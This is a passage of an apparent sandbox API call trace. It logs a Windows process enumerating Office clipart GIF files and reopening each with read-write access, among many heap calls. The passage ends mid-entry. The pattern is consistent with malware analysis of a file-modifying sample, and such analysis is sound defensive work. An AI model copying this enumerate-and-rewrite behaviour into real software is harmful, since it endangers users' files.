[0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.812] AreFileApisANSI () returned 1 [0100.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0100.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 69 [0100.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47a)) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0100.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.812] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d9f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00161_.GIF", cAlternateFileName="")) returned 1 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.813] AreFileApisANSI () returned 1 [0100.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0100.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.814] AreFileApisANSI () returned 1 [0100.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0100.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 69 [0100.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.815] GetFileType (hFile=0x27c) returned 0x1 [0100.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0100.815] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.815] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.815] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.815] CloseHandle (hObject=0x27c) returned 1 [0100.815] AreFileApisANSI () returned 1 [0100.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0100.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 69 [0100.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.816] GetFileType (hFile=0x27c) returned 0x1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0100.816] CloseHandle (hObject=0x27c) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.817] AreFileApisANSI () returned 1 [0100.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 69 [0100.817] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d9f)) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0100.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.817] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b48, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00163_.GIF", cAlternateFileName="")) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.818] AreFileApisANSI () returned 1 [0100.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0100.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.819] AreFileApisANSI () returned 1 [0100.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0100.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 69 [0100.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.819] GetFileType (hFile=0x27c) returned 0x1 [0100.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0100.819] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.819] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.819] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.820] CloseHandle (hObject=0x27c) returned 1 [0100.820] AreFileApisANSI () returned 1 [0100.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0100.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 69 [0100.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.820] GetFileType (hFile=0x27c) returned 0x1 [0100.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.820] CloseHandle (hObject=0x27c) returned 1 [0100.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 